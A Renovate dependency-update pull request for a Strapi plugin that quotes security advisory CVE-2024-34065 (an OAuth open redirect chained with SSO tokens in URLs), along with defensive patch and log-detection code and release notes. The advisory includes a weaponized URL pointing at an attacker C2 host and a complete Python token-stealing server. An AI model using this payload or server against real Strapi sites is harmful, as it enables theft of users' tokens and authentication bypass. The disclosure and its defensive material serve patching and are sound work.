freeCodeCamp / publish

> Content backend platform for /news
https://publish.freecodecamp.org
BSD 3-Clause "New" or "Revised" License

fix(deps): update dependency @strapi/plugin-users-permissions to v4.24.2 [security] #443

Open renovate[bot] opened 3 weeks ago

renovate[bot] commented 3 weeks ago

This PR contains the following updates:

Package: @strapi/plugin-users-permissions
Change: 4.15.5 -> 4.24.2

GitHub Vulnerability Alerts

CVE-2024-34065

Summary

By combining two vulnerabilities (an Open Redirect and a session token sent as a URL query parameter) in the Strapi framework, it is possible for an unauthenticated attacker to bypass authentication mechanisms and retrieve third-party tokens. The attack requires user interaction (one click).

Impact

Unauthenticated attackers can leverage the two vulnerabilities to obtain a third-party token and bypass the authentication of Strapi apps.

Technical details

Vulnerability 1: Open Redirect

Description

Open redirection vulnerabilities arise when an application incorporates user-controllable data into the target of a redirection in an unsafe way. An attacker can construct a URL within the application that causes a redirection to an arbitrary external domain.

In the specific context of Strapi, this vulnerability allows the SSO token to be stolen, allowing an attacker to authenticate himself within the application.

Remediation

If possible, applications should avoid incorporating user-controllable data into redirection targets. In many cases, this behavior can be avoided in two ways:

If it is considered unavoidable for the redirection function to receive user-controllable input and incorporate this into the redirection target, one of the following measures should be used to minimize the risk of redirection attacks:

Example 1: Open Redirect in /api/connect/microsoft via $_GET["callback"]

Payload:

https://google.fr/

Final payload:

https://<TARGET>/api/connect/microsoft?callback=https://google.fr/

The user clicks on the link.

The request intercepted in Burp shows the redirect to Microsoft.

Microsoft checks the cookies and redirects to the original domain (and route), but with different GET parameters.

Then the page redirects to the domain controlled by the attacker, with a token appended to the attacker-controlled URL.

The domain originally specified as the $_GET["callback"] parameter (https://google.fr) is present in the cookies, so <TARGET> is using the cookie (koa.sess) to redirect.

koa.sess cookie:

eyJncmFudCI6eyJwcm92aWRlciI6Im1pY3Jvc29mdCIsImR5bmFtaWMiOnsiY2FsbGJhY2siOiJodHRwczovL2dvb2dsZS5mci8ifX0sIl9leHBpcmUiOjE3MDAyMzQyNDQyNjMsIl9tYXhBZ2UiOjg2NDAwMDAwfQ==
{"grant":{"provider":"microsoft","dynamic":{"callback":"https://google.fr/"}},"_expire":1700234244263,"_maxAge":86400000}

The vulnerability seems to come from the application's core:

File: packages/plugins/users-permissions/server/controllers/auth.js

'use strict';

/**
 * Auth.js controller
 *
 * @description: A set of functions called "actions" for managing `Auth`.
 */

/* eslint-disable no-useless-escape */
const crypto = require('crypto');
const _ = require('lodash');
const { concat, compact, isArray } = require('lodash/fp');
const utils = require('@strapi/utils');
const {
  contentTypes: { getNonWritableAttributes },
} = require('@strapi/utils');
const { getService } = require('../utils');
const {
  validateCallbackBody,
  validateRegisterBody,
  validateSendEmailConfirmationBody,
  validateForgotPasswordBody,
  validateResetPasswordBody,
  validateEmailConfirmationBody,
  validateChangePasswordBody,
} = require('./validation/auth');

const { getAbsoluteAdminUrl, getAbsoluteServerUrl, sanitize } = utils;
const { ApplicationError, ValidationError, ForbiddenError } = utils.errors;

const sanitizeUser = (user, ctx) => {
  const { auth } = ctx.state;
  const userSchema = strapi.getModel('plugin::users-permissions.user');

  return sanitize.contentAPI.output(user, userSchema, { auth });
};

module.exports = {
  async callback(ctx) {
    const provider = ctx.params.provider || 'local';
    const params = ctx.request.body;

    const store = strapi.store({ type: 'plugin', name: 'users-permissions' });
    const grantSettings = await store.get({ key: 'grant' });

    const grantProvider = provider === 'local' ? 'email' : provider;

    if (!_.get(grantSettings, [grantProvider, 'enabled'])) {
      throw new ApplicationError('This provider is disabled');
    }

    if (provider === 'local') {
      await validateCallbackBody(params);

      const { identifier } = params;

      // Check if the user exists.
      const user = await strapi.query('plugin::users-permissions.user').findOne({
        where: {
          provider,
          $or: [{ email: identifier.toLowerCase() }, { username: identifier }],
        },
      });

      if (!user) {
        throw new ValidationError('Invalid identifier or password');
      }

      if (!user.password) {
        throw new ValidationError('Invalid identifier or password');
      }

      const validPassword = await getService('user').validatePassword(
        params.password,
        user.password
      );

      if (!validPassword) {
        throw new ValidationError('Invalid identifier or password');
      }

      const advancedSettings = await store.get({ key: 'advanced' });
      const requiresConfirmation = _.get(advancedSettings, 'email_confirmation');

      if (requiresConfirmation && user.confirmed !== true) {
        throw new ApplicationError('Your account email is not confirmed');
      }

      if (user.blocked === true) {
        throw new ApplicationError('Your account has been blocked by an administrator');
      }

      return ctx.send({
        jwt: getService('jwt').issue({ id: user.id }),
        user: await sanitizeUser(user, ctx),
      });
    }

    // Connect the user with the third-party provider.
    try {
      const user = await getService('providers').connect(provider, ctx.query);

      if (user.blocked) {
        throw new ForbiddenError('Your account has been blocked by an administrator');
      }

      return ctx.send({
        jwt: getService('jwt').issue({ id: user.id }),
        user: await sanitizeUser(user, ctx),
      });
    } catch (error) {
      throw new ApplicationError(error.message);
    }
  },

  //...

  async connect(ctx, next) {
    const grant = require('grant-koa');

    const providers = await strapi
      .store({ type: 'plugin', name: 'users-permissions', key: 'grant' })
      .get();

    const apiPrefix = strapi.config.get('api.rest.prefix');
    const grantConfig = {
      defaults: {
        prefix: `${apiPrefix}/connect`,
      },
      ...providers,
    };

    const [requestPath] = ctx.request.url.split('?');
    const provider = requestPath.split('/connect/')[1].split('/')[0];

    if (!_.get(grantConfig[provider], 'enabled')) {
      throw new ApplicationError('This provider is disabled');
    }

    if (!strapi.config.server.url.startsWith('http')) {
      strapi.log.warn(
        'You are using a third party provider for login. Make sure to set an absolute url in config/server.js. More info here: https://docs.strapi.io/developer-docs/latest/plugins/users-permissions.html#setting-up-the-server-url'
      );
    }

    // Ability to pass OAuth callback dynamically
    grantConfig[provider].callback =
      _.get(ctx, 'query.callback') ||
      _.get(ctx, 'session.grant.dynamic.callback') ||
      grantConfig[provider].callback;
    grantConfig[provider].redirect_uri = getService('providers').buildRedirectUri(provider);

    return grant(grantConfig)(ctx, next);
  },

  //...

};

And more specifically:

...

    // Ability to pass OAuth callback dynamically
    grantConfig[provider].callback =
      _.get(ctx, 'query.callback') ||
      _.get(ctx, 'session.grant.dynamic.callback') ||
      grantConfig[provider].callback;
    grantConfig[provider].redirect_uri = getService('providers').buildRedirectUri(provider);

    return grant(grantConfig)(ctx, next);
...

Possible patch:

grantConfig[provider].callback = process.env[`${provider.toUpperCase()}_REDIRECT_URL`] || grantConfig[provider].callback

_.get(ctx, 'query.callback') = $_GET["callback"] and _.get(ctx, 'session') = $_COOKIE["koa.sess"] (which is {"grant":{"provider":"microsoft","dynamic":{"callback":"https://XXXXXXX/"}},"_expire":1701275652123,"_maxAge":86400000}) so _.get(ctx, 'session.grant.dynamic.callback') = https://XXXXXXX/.

The route is clearly defined here:

File: packages/plugins/users-permissions/server/routes/content-api/auth.js

'use strict';

module.exports = [

//...

  {
    method: 'GET',
    path: '/auth/:provider/callback',
    handler: 'auth.callback',
    config: {
      prefix: '',
    },
  },

  //...

];

File: packages/plugins/users-permissions/server/services/providers-registry.js


const getInitialProviders = ({ purest }) => ({

//..

  async microsoft({ accessToken }) {
    const microsoft = purest({ provider: 'microsoft' });

    return microsoft
      .get('me')
      .auth(accessToken)
      .request()
      .then(({ body }) => ({
        username: body.userPrincipalName,
        email: body.userPrincipalName,
      }));
  },

//..

});

If the $_GET["callback"] parameter is present in the GET request, the || chain in the assignment short-circuits on that first operand and never evaluates the remaining ones. The value is then stored in the cookie koa.sess:

koa.sess=eyJncmFudCI6eyJwcm92aWRlciI6Im1pY3Jvc29mdCIsImR5bmFtaWMiOnsiY2FsbGJhY2siOiJodHRwczovL2FkbWluLmludGUubmV0YXRtby5jb20vdXNlcnMvYXV0aC9yZWRpcmVjdCJ9fSwiX2V4cGlyZSI6MTcwMTI3NTY1MjEyMywiX21heEFnZSI6ODY0MDAwMDB9

Once base64-decoded, this becomes {"grant":{"provider":"microsoft","dynamic":{"callback":"https://<TARGET>/users/auth/redirect"}},"_expire":1701275652123,"_maxAge":86400000}.

The signature of the cookie is stored in cookie koa.sess.sig:

koa.sess.sig=wTRmcVRrn88hWMdg84VvSD87-_0

File: packages/plugins/users-permissions/server/bootstrap/grant-config.js


//..

  microsoft: {
    enabled: false,
    icon: 'windows',
    key: '',
    secret: '',
    callback: `${baseURL}/microsoft/callback`,
    scope: ['user.read'],
  },

//..
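The callback resolution in connect() and the koa.sess cookie it writes, as an added example that is not Strapi's code: decode the session cookie quoted above (without verifying koa.sess.sig), reproduce the vulnerable precedence, and place an origin-allowlist resolution next to it. The configured callback on app.example and the allowlist entry are assumed placeholder values.

```javascript
// Added example (not Strapi's code): how the dynamic OAuth callback gets picked,
// and how an origin allowlist closes the open redirect. Plain Node.js, no dependencies.

// koa.sess cookie value quoted in the advisory (base64-encoded JSON).
const ADVISORY_COOKIE =
  'eyJncmFudCI6eyJwcm92aWRlciI6Im1pY3Jvc29mdCIsImR5bmFtaWMiOnsiY2FsbGJhY2siOiJodHRwczovL2dvb2dsZS5mci8ifX0sIl9leHBpcmUiOjE3MDAyMzQyNDQyNjMsIl9tYXhBZ2UiOjg2NDAwMDAwfQ==';

// Assumed deployment values (placeholders, not taken from the advisory).
const CONFIGURED_CALLBACK = 'https://app.example/api/connect/microsoft/callback';
const ALLOWED_ORIGINS = ['https://admin.app.example'];

// Decode the koa.sess payload. This does NOT check koa.sess.sig, so the result is
// untrusted input; koa-session verifies the signature before exposing ctx.session.
function decodeKoaSession(cookieValue) {
  return JSON.parse(Buffer.from(cookieValue, 'base64').toString('utf8'));
}

// Session-carried callback or undefined (mirrors _.get(ctx, 'session.grant.dynamic.callback')).
function sessionCallback(session) {
  return session && session.grant && session.grant.dynamic
    ? session.grant.dynamic.callback
    : undefined;
}

// Vulnerable precedence from auth.js: the first truthy value wins, with no validation.
function resolveCallbackVulnerable(query, session, configuredCallback) {
  return (query && query.callback) || sessionCallback(session) || configuredCallback;
}

// Origin (scheme://host[:port]) of an absolute http(s) URL, or null for anything else
// (scheme-relative paths, javascript: URLs, malformed input).
function originOf(value) {
  let url;
  try {
    url = new URL(value);
  } catch (e) {
    return null;
  }
  return url.protocol === 'https:' || url.protocol === 'http:' ? url.origin : null;
}

// Hardened precedence: a query or session callback is honoured only when its origin is
// the configured callback's own origin or an explicitly allowlisted origin.
function resolveCallbackSafe(query, session, configuredCallback, allowedOrigins = []) {
  const allowed = new Set(
    [originOf(configuredCallback), ...allowedOrigins.map(originOf)].filter(Boolean)
  );
  for (const candidate of [query && query.callback, sessionCallback(session)]) {
    if (typeof candidate !== 'string') continue;
    const origin = originOf(candidate);
    if (origin !== null && allowed.has(origin)) return candidate;
  }
  return configuredCallback; // anything else falls back to the static configuration
}

// Walk the advisory's scenario: the attacker-chosen callback survives in the session.
function demo() {
  const session = decodeKoaSession(ADVISORY_COOKIE);
  return {
    sessionCallback: sessionCallback(session),
    vulnerable: resolveCallbackVulnerable({}, session, CONFIGURED_CALLBACK),
    safe: resolveCallbackSafe({}, session, CONFIGURED_CALLBACK, ALLOWED_ORIGINS),
    safeAllowed: resolveCallbackSafe(
      { callback: 'https://admin.app.example/users/auth/redirect' },
      session,
      CONFIGURED_CALLBACK,
      ALLOWED_ORIGINS
    ),
  };
}

console.log(demo());
```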

Vulnerability 2: Session token in URL

Description

Applications should not send session tokens as URL query parameters; they should instead use an alternative mechanism for transmitting session tokens, such as HTTP cookies or hidden fields in forms submitted using the POST method.

Example 1: SSO token transmitted within URL ($_GET["access_token"])

When the callback is invoked, the third-party token is transmitted insecurely within the URL, which can be used to increase the impact of the Open Redirect vulnerability described previously by stealing the SSO token.

Weaponized payload:

https://<TARGET>/api/connect/microsoft?callback=http://<C2>:8080/

With a web server specially developed to exploit the vulnerability listening on <C2>:8080, it is possible to retrieve a JWT token allowing authentication on Strapi.
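A defender-side check for both weaknesses, added here and not part of the advisory: it scans constructed access-log lines (modelled on the advisory's flow, tokens truncated) for bearer-style tokens in GET query strings and for /connect/<provider> requests whose callback points off-host. The combined-log regex and the host app.example are assumptions.

```javascript
// Added example (not from the advisory): access-log detection for the two weaknesses.

const OWN_HOST = 'app.example'; // assumed host of the Strapi instance

// Constructed sample lines in nginx/Apache combined format (tokens truncated).
const SAMPLE_LOG = [
  '203.0.113.5 - - [27/Nov/2023:17:58:40 +0000] "GET /api/connect/microsoft?callback=http://198.51.100.7:8080/ HTTP/1.1" 302 0',
  '203.0.113.5 - - [27/Nov/2023:17:58:46 +0000] "GET /api/auth/microsoft/callback?access_token=eyJ0eXAiOiJKV.REDACTED.yBzA HTTP/1.1" 200 411',
  '198.51.100.9 - - [27/Nov/2023:18:01:02 +0000] "GET /api/connect/microsoft?callback=https://app.example/users/auth/redirect HTTP/1.1" 302 0',
  '198.51.100.9 - - [27/Nov/2023:18:01:03 +0000] "GET /api/users/me HTTP/1.1" 200 512',
  'garbage line that does not parse',
];

// Query parameters that should never carry a bearer-style secret in a GET URL.
const TOKEN_PARAMS = new Set(['access_token', 'id_token', 'refresh_token', 'jwt']);

// client ip, timestamp, method, request target, status code.
const LINE_RE = /^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3})/;

function parseLine(line) {
  const m = LINE_RE.exec(line);
  return m
    ? { client: m[1], time: m[2], method: m[3], target: m[4], status: Number(m[5]) }
    : null;
}

// Host part of an absolute URL, or null for relative or malformed values.
function hostOf(value) {
  try {
    return new URL(value).host;
  } catch (e) {
    return null;
  }
}

// One finding per weakness observed: token_in_url (Vulnerability 2) and
// offhost_callback on /connect/<provider> (Vulnerability 1).
function scanAccessLog(lines, ownHost) {
  const findings = [];
  for (const line of lines) {
    const req = parseLine(line);
    if (!req) continue; // unparsable lines are skipped, not treated as findings
    const url = new URL(req.target, `https://${ownHost}`);
    for (const name of url.searchParams.keys()) {
      if (TOKEN_PARAMS.has(name)) {
        findings.push({ kind: 'token_in_url', client: req.client, time: req.time, path: url.pathname, param: name });
      }
    }
    if (url.pathname.includes('/connect/') && url.searchParams.has('callback')) {
      const callback = url.searchParams.get('callback');
      if (hostOf(callback) !== ownHost) {
        findings.push({ kind: 'offhost_callback', client: req.client, time: req.time, path: url.pathname, callback });
      }
    }
  }
  return findings;
}

console.log(scanAccessLog(SAMPLE_LOG, OWN_HOST));
```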

A user is on his browser when he decides to click on a link sent to him by e-mail.


The attacker places the malicious link in the URL bar to simulate a victim's click.


The server specially developed by the attacker to show that the vulnerability is exploitable recovers the user's SSO token.

Everything is invisible to the victim, because the victim did not end up on a different web page.


The attacker can use the SSO token to authenticate himself within the application and retrieve a valid JWT token enabling him to interact with it.


Details
Get the JWT token with the access_token

First, the SSO token is used to authenticate and obtain a JWT token, which makes it possible to interact with the various API routes.

Request (HTTP):

GET /api/auth/microsoft/callback?access_token=eyJ0eXAiOiJKV<REDACTED>yBzA HTTP/1.1
Host: <TARGET>

Response (HTTP):

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 27 Nov 2023 17:58:46 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 411
Connection: keep-alive
Content-Security-Policy: connect-src 'self' https:;img-src 'self' data: blob: https://market-assets.strapi.io;media-src 'self' data: blob:;default-src 'self';base-uri 'self';font-src 'self' https: data:;form-action 'self';frame-ancestors 'self';object-src 'none';script-src 'self';script-src-attr 'none';style-src 'self' https: 'unsafe-inline'
Referrer-Policy: no-referrer
Strict-Transport-Security: max-age=31536000; includeSubDomains
X-Content-Type-Options: nosniff
X-DNS-Prefetch-Control: off
X-Download-Options: noopen
X-Frame-Options: SAMEORIGIN
X-Permitted-Cross-Domain-Policies: none
Vary: Origin
X-XSS-Protection: 1; mode=block
Strict-Transport-Security: max-age=31536000; includeSubDomains
X-Powered-By: <REDACTED>

{"jwt":"eyJhbG<REDACTED>eCac","user":{"id":111,"username":"<REDACTED>@<REDACTED>-ext.com","email":"<redacted>@<redacted>-ext.com","provider":"microsoft","confirmed":true,"blocked":false,"createdAt":"2023-11-14T12:35:42.440Z","updatedAt":"2023-11-16T21:00:19.241Z","is_external":false}}

Request API routes using the JWT token

Then reuse the JWT token to request the API.

Request (HTTP):

GET /api/users/me/groups?app=support HTTP/1.1
Host: <TARGET>
Authorization: Bearer eyJ<REDACTED>EeCac

Response (HTTP):

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 28 Nov 2023 13:45:42 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 24684
Connection: keep-alive
Content-Security-Policy: connect-src 'self' https:;img-src 'self' data: blob: https://market-assets.strapi.io;media-src 'self' data: blob:;default-src 'self';base-uri 'self';font-src 'self' https: data:;form-action 'self';frame-ancestors 'self';object-src 'none';script-src 'self';script-src-attr 'none';style-src 'self' https: 'unsafe-inline'
Referrer-Policy: no-referrer
Strict-Transport-Security: max-age=31536000; includeSubDomains
X-Content-Type-Options: nosniff
X-DNS-Prefetch-Control: off
X-Download-Options: noopen
X-Frame-Options: SAMEORIGIN
X-Permitted-Cross-Domain-Policies: none
Vary: Origin
X-RateLimit-Limit: 10
X-RateLimit-Remaining: 9
X-RateLimit-Reset: 1701179203
X-XSS-Protection: 1; mode=block
Strict-Transport-Security: max-age=31536000; includeSubDomains
X-Powered-By: <REDACTED>

{"apps":{"support":{"groups":[{"device_whitelist":null,"name":"test - support","id":10,"group_privileges":[{"id":37,<REDACTED>

...

POC (Web server stealing SSO token and retrieving JWT token then bypassing authentication)

import base64
import json
import urllib.parse

from http.server import BaseHTTPRequestHandler, HTTPServer
from sys import argv

# Strapi URL.
TARGET = "target.com"

# URLs to which victims are automatically redirected.
REDIRECT_URL = [
    "strapi.io",
    "www.google.fr"
]

# URL used to generate a valid JWT token for authentication within the
# application.
GEN_JWT_URL = f"https://{TARGET}/api/auth/microsoft/callback"

# This function is used to generate a curl command which, once executed, will
# give us a valid JWT connection token.
def generate_curl_command(token):
    command = f"curl '{GEN_JWT_URL}?access_token={token}'"
    return command

# We create a custom HTTP server to retrieve users' SSO tokens.
class CustomServer(BaseHTTPRequestHandler):

    # Here we override the default logging function to reduce verbosity.
    def log_message(self, format, *args):
        pass

    # This function automatically redirects a user to the page defined in the
    # global variable linked to the redirection.
    def _set_response(self):
        self.send_response(302)
        self.send_header("Location", REDIRECT_URL[0])
        self.end_headers()

    # If an SSO token is present, we parse it and log the result in STDOUT.
    def do_GET(self):
        # This condition checks whether a token is present in the URL.
        if str(self.path).find("access_token") != -1:
            # If this is the case, we recover the token.
            query = urllib.parse.urlparse(self.path).query
            query_components = dict(qc.split("=") for qc in query.split("&"))
            access_token = urllib.parse.unquote(query_components["access_token"])

            # In the token, which is a string in JWT format, we retrieve the
            # body part of the token.
            interesting_data = access_token.split(".")[1]

            # Patching base64 encoded data.
            interesting_data = interesting_data + "=" * (-len(interesting_data) % 4)

            # Parsing JSON.
            json_data = json.loads(base64.b64decode(interesting_data.encode()))
            given_name, family_name, ipaddr, upn = json_data["given_name"], json_data["family_name"], json_data["ipaddr"], json_data["upn"]

            print(f"[+] Token captured for {family_name} {given_name}, {upn} ({ipaddr}):\n{access_token}\n")
            print(f"[*] Run: \"{generate_curl_command(query_components['access_token'])}\" to get JWT token")

        self._set_response()
        self.wfile.write("Redirecting ...".encode("utf-8"))

def run(server_class=HTTPServer, handler_class=CustomServer, ip="0.0.0.0", port=8080):
    server_address = (ip, port)
    httpd = server_class(server_address, handler_class)

    print(f"Starting httpd ({ip}:{port}) ...")
    try:
        httpd.serve_forever()
    except KeyboardInterrupt:
        pass

    httpd.server_close()
    print("Stopping httpd ...")

if __name__ == "__main__":
    if len(argv) == 3:
        run(ip=argv[1], port=int(argv[2]))
    else:
        run()

Release Notes

strapi/strapi (@strapi/plugin-users-permissions)

### [`v4.24.2`](https://togithub.com/strapi/strapi/releases/tag/v4.24.2)

[Compare Source](https://togithub.com/strapi/strapi/compare/v4.24.1...v4.24.2)

##### :warning: Security Warning and Notice :warning:

Strapi was made aware of a vulnerability that was patched in this release. For now we are going to delay the detailed disclosure of the exact details on how to exploit it and how it was patched, to give time for users to upgrade before we do public disclosure.

##### Update and Migration Guides

- General update guide can be found [here](https://docs.strapi.io/developer-docs/latest/update-migration-guides/update-version.html)
- Migration guides can be found [here](https://docs.strapi.io/developer-docs/latest/update-migration-guides/migration-guides.html)

**Full Changelog**: https://github.com/strapi/strapi/compare/v4.24.2...v4.24.1

### [`v4.24.1`](https://togithub.com/strapi/strapi/releases/tag/v4.24.1)

[Compare Source](https://togithub.com/strapi/strapi/compare/v4.24.0...v4.24.1)

##### Bug fix

- \[core:admin] fix(admin): if were in EE mode wait for the EE routes to be loaded before rendering ([#20238](https://github.com/strapi/strapi/pull/20238)) @joshuaellis
- \[core:content-manager] fix(content-manager): bulk publish would only ever show first entry to be published ([#20234](https://github.com/strapi/strapi/pull/20234)) @Feranchz

### [`v4.24.0`](https://togithub.com/strapi/strapi/releases/tag/v4.24.0)

[Compare Source](https://togithub.com/strapi/strapi/compare/v4.23.2...v4.24.0)

##### Bug fix

- \[core:admin] fix: ee not being extended because no default export ([#20171](https://github.com/strapi/strapi/pull/20171)) @alexandrebodin
- \[core:content-manager] fix: content could be undefined ([#20180](https://github.com/strapi/strapi/pull/20180)) @alexandrebodin
- \[core:database] fix(database): add prefix to avoid join column name conflicts ([#20027](https://github.com/strapi/strapi/pull/20027)) @innerdvations
- \[core:upload] enhancement: use file path in place of streams to optimize sharp fragmentation & libvips caching ([#20080](https://github.com/strapi/strapi/pull/20080)) @alexandrebodin

##### Chore

- \[core:core] Make cors middleware compliant with the intended spec ([#20044](https://github.com/strapi/strapi/pull/20044)) @alexandrebodin
- \[dependencies] Chore: Upgrade mysql2 from 3.6.0 to 3.9.4 ([#20123](https://github.com/strapi/strapi/pull/20123)) @derrickmehaffy

### [`v4.23.2`](https://togithub.com/strapi/strapi/releases/tag/v4.23.2)

[Compare Source](https://togithub.com/strapi/strapi/compare/v4.23.1...v4.23.2)

##### What's Changed

- fix: issue 20138 by @alexandrebodin in [#20231](https://github.com/strapi/strapi/pull/20231)

**Full Changelog**: https://github.com/strapi/strapi/compare/v4.23.1...v4.23.2

### [`v4.23.1`](https://togithub.com/strapi/strapi/releases/tag/v4.23.1)

[Compare Source](https://togithub.com/strapi/strapi/compare/v4.23.0...v4.23.1)

##### Documentation

- \[docs] Add Local Search plugin to Contributor docs ([#20036](https://github.com/strapi/strapi/pull/20036)) @pwizla

##### Chore

- \[dependencies] chore(pack-up): remove from monorepo ([#20082](https://github.com/strapi/strapi/pull/20082)) @joshuaellis
- \[dependencies] chore(deps): bump @strapi/design-system from 1.16.0 to 1.18.0 ([#20115](https://github.com/strapi/strapi/pull/20115)) @markkaylor

##### Bug fix

- \[core:content-releases] fix(content-releases): fix e2e failing test ([#20094](https://github.com/strapi/strapi/pull/20094)) @simotae14

### [`v4.23.0`](https://togithub.com/strapi/strapi/releases/tag/v4.23.0)

[Compare Source](https://togithub.com/strapi/strapi/compare/v4.22.1...v4.23.0)

##### Chore

- \[dependencies] Chore: Update vite and webpack-dev-middleware ([#20037](https://github.com/strapi/strapi/pull/20037)) @derrickmehaffy
- ~~\[external] Update sharp package to version v0.33.3 ([#19311](https://github.com/strapi/strapi/pull/19311)) @mariansimecek~~
- \[tooling] chore: ignore nx cache ([#20023](https://github.com/strapi/strapi/pull/20023)) @innerdvations
- \[tooling] chore: add watch script for all projects ([#20068](https://github.com/strapi/strapi/pull/20068)) @innerdvations

##### Bug fix

- \[core:admin] fix(admin): force an absolute URL if the BACKEND_URL is relative ([#19950](https://github.com/strapi/strapi/pull/19950)) @joshuaellis
- \[core:content-releases] Hide Locale column and grouping option when i18n plugin is not installed ([#19358](https://github.com/strapi/strapi/pull/19358)) @simotae14
- \[core:content-releases] fix: fix boot issue when removing i18n from an app ([#20073](https://github.com/strapi/strapi/pull/20073)) @Marc-Roig
- \[core:helper-plugin] fix issue [#19532](https://togithub.com/strapi/strapi/issues/19532) ([#19970](https://github.com/strapi/strapi/pull/19970)) @alexandrebodin
- \[core:strapi] fix(content-manager): populate media and nested components on cloning ([#19958](https://github.com/strapi/strapi/pull/19958)) @simotae14
- \[core:upload] Revert sharp to 0.32.6 ([#20066](https://github.com/strapi/strapi/pull/20066)) @markkaylor

##### New feature

- \[core:content-releases] Feat(releases): add release column to CM list view ([#19926](https://github.com/strapi/strapi/pull/19926)) @madhurisandbhor

##### Enhancement

- \[core:database] feat: support media deep filtering & relation shortcut filters ([#19971](https://github.com/strapi/strapi/pull/19971)) @alexandrebodin

### [`v4.22.1`](https://togithub.com/strapi/strapi/releases/tag/v4.22.1)

[Compare Source](https://togithub.com/strapi/strapi/compare/v4.22.0...v4.22.1)

##### What's Changed

- Chore: Revert @koa/cors upgrade to 5.0.0 due to breaking cors middleware by @derrickmehaffy in [#20041](https://github.com/strapi/strapi/pull/20041)

**Full Changelog**: https://github.com/strapi/strapi/compare/v4.22.0...v4.22.1

### [`v4.22.0`](https://togithub.com/strapi/strapi/releases/tag/v4.22.0)

[Compare Source](https://togithub.com/strapi/strapi/compare/v4.21.1...v4.22.0)

##### :warning: Security Warning and Notice :warning:

Strapi was made aware of a vulnerability that was patched in this release. For now we are going to delay the detailed disclosure of the exact details on how to exploit it and how it was patched, to give time for users to upgrade before we do public disclosure.

##### Bug fix

- \[core:content-manager] fix: Creating a new locale doesn't pre-fill the non-internationalized fields ([#18773](https://github.com/strapi/strapi/pull/18773)) @derrickmehaffy
- \[core:content-manager] fix: show name of relations when lazy loading them ([#19915](https://github.com/strapi/strapi/pull/19915)) @Marc-Roig
- \[core:content-releases] fix(releases): Scheduling info capitalization ([#19945](https://github.com/strapi/strapi/pull/19945)) @madhurisandbhor
- \[core:content-releases] fix(releases): On edit release error dont close modal ([#19946](https://github.com/strapi/strapi/pull/19946)) @madhurisandbhor
- \[core:upload] fix: sanitize file name when uploading image ([#19913](https://github.com/strapi/strapi/pull/19913)) @Marc-Roig
- \[plugin:i18n] fix:issue on do not validate locale if not creating for all locales ([#19799](https://github.com/strapi/strapi/pull/19799)) @binar1

##### New feature

- \[core:content-releases] Feat(releases): Bulk Release ([#19891](https://github.com/strapi/strapi/pull/19891)) @madhurisandbhor
- \[plugin:graphql] fix(plugin-graphql): allow to use GET queries for graphql ([#19168](https://github.com/strapi/strapi/pull/19168)) @mcfedr

##### Chore

- \[dependencies] chore(deps): bump @koa/cors from 3.4.3 to 5.0.0 ([#19921](https://github.com/strapi/strapi/pull/19921)) @derrickmehaffy
- \[dependencies] chore(deps): bump sanitize-html (and types) from 2.11.0 to 2.13.0 ([#19922](https://github.com/strapi/strapi/pull/19922)) @derrickmehaffy

### [`v4.21.1`](https://togithub.com/strapi/strapi/releases/tag/v4.21.1)

[Compare Source](https://togithub.com/strapi/strapi/compare/v4.21.0...v4.21.1)

##### Enhancement

- \[core:content-manager] feat(Releases): Bulk actions renderer ([#19749](https://github.com/strapi/strapi/pull/19749)) @madhurisandbhor

##### Bug fix

- \[core:admin] fix(admin): show purchase pages also with Cloud plans and change message ([#19855](https://github.com/strapi/strapi/pull/19855)) @simotae14
- \[core:content-releases] fix(content-releases): fix creation of utc time based when sending to back ([#19865](https://github.com/strapi/strapi/pull/19865)) @Feranchz
- \[core:content-type-builder] fix: reload ctb after save ([#19811](https://github.com/strapi/strapi/pull/19811)) @Bassel17
- \[core:data-transfer] fix: add support for private upload providers ([#19863](https://github.com/strapi/strapi/pull/19863)) @Bassel17
- \[core:data-transfer] Solve foreign key error on push transfers ([#19870](https://github.com/strapi/strapi/pull/19870)) @christiancp100

### [`v4.21.0`](https://togithub.com/strapi/strapi/releases/tag/v4.21.0)

[Compare Source](https://togithub.com/strapi/strapi/compare/v4.20.5...v4.21.0)

##### Enhancement

- \[plugin:users-permissions] EE feat: Add keycloak native users-permissions provider ([#19741](https://github.com/strapi/strapi/pull/19741)) @derrickmehaffy

##### New feature

- \[core:content-releases] removing scheduling future flag for stable release ([#19754](https://github.com/strapi/strapi/pull/19754)) @Feranchz
- \[core:content-releases] fix content releases cache issue ([#19791](https://github.com/strapi/strapi/pull/19791)) @Feranchz
- \[core:content-releases] new create many release actions endpoint ([#19778](https://github.com/strapi/strapi/pull/19778)) @Feranchz

### [`v4.20.5`](https://togithub.com/strapi/strapi/releases/tag/v4.20.5)

[Compare Source](https://togithub.com/strapi/strapi/compare/v4.20.4...v4.20.5)

##### Bug fix

- \[core:content-releases] fix(content-releases): Limit min date selection to schedule a release ([#19636](https://github.com/strapi/strapi/pull/19636)) @madhurisandbhor
- \[core:content-releases] fix(content-releases): remove the error in the console when we delete a release ([#19690](https://github.com/strapi/strapi/pull/19690)) @simotae14
- \[core:content-releases] fix(content-releases): exclude release content-types from graphql ([#19703](https://github.com/strapi/strapi/pull/19703)) @markkaylor
- \[core:content-releases] fix: change actions locale when changes on localization ([#19706](https://github.com/strapi/strapi/pull/19706)) @Feranchz
- \[core:content-type-builder] Remove add another field button if it's dynamic zone from CTB ([#19639](https://github.com/strapi/strapi/pull/19639)) @Bassel17
- \[core:upload] Add sizeInBytes on resized and optimized images ([#19707](https://github.com/strapi/strapi/pull/19707)) @giu1io

##### Chore

- \[dependencies] chore(deps): update ds to 1.16.0 ([#19678](https://github.com/strapi/strapi/pull/19678)) @joshuaellis
- \[tooling] chore(tests): backport e2e config ([#19654](https://github.com/strapi/strapi/pull/19654)) @markkaylor

### [`v4.20.4`](https://togithub.com/strapi/strapi/releases/tag/v4.20.4)

[Compare Source](https://togithub.com/strapi/strapi/compare/v4.20.3...v4.20.4)

##### Enhancement

- \[core:data-transfer] feat(dts): support models and contentTypes ([#19604](https://github.com/strapi/strapi/pull/19604)) @markkaylor

##### Bug fix

- \[core:admin] fix(content-manager): send locale when deleting i18n single type ([#19629](https://github.com/strapi/strapi/pull/19629)) @jhoward1994
- \[core:data-transfer] fix: api and transfer token lifespan select lists work with all durations ([#19621](https://github.com/strapi/strapi/pull/19621)) @innerdvations

##### Chore

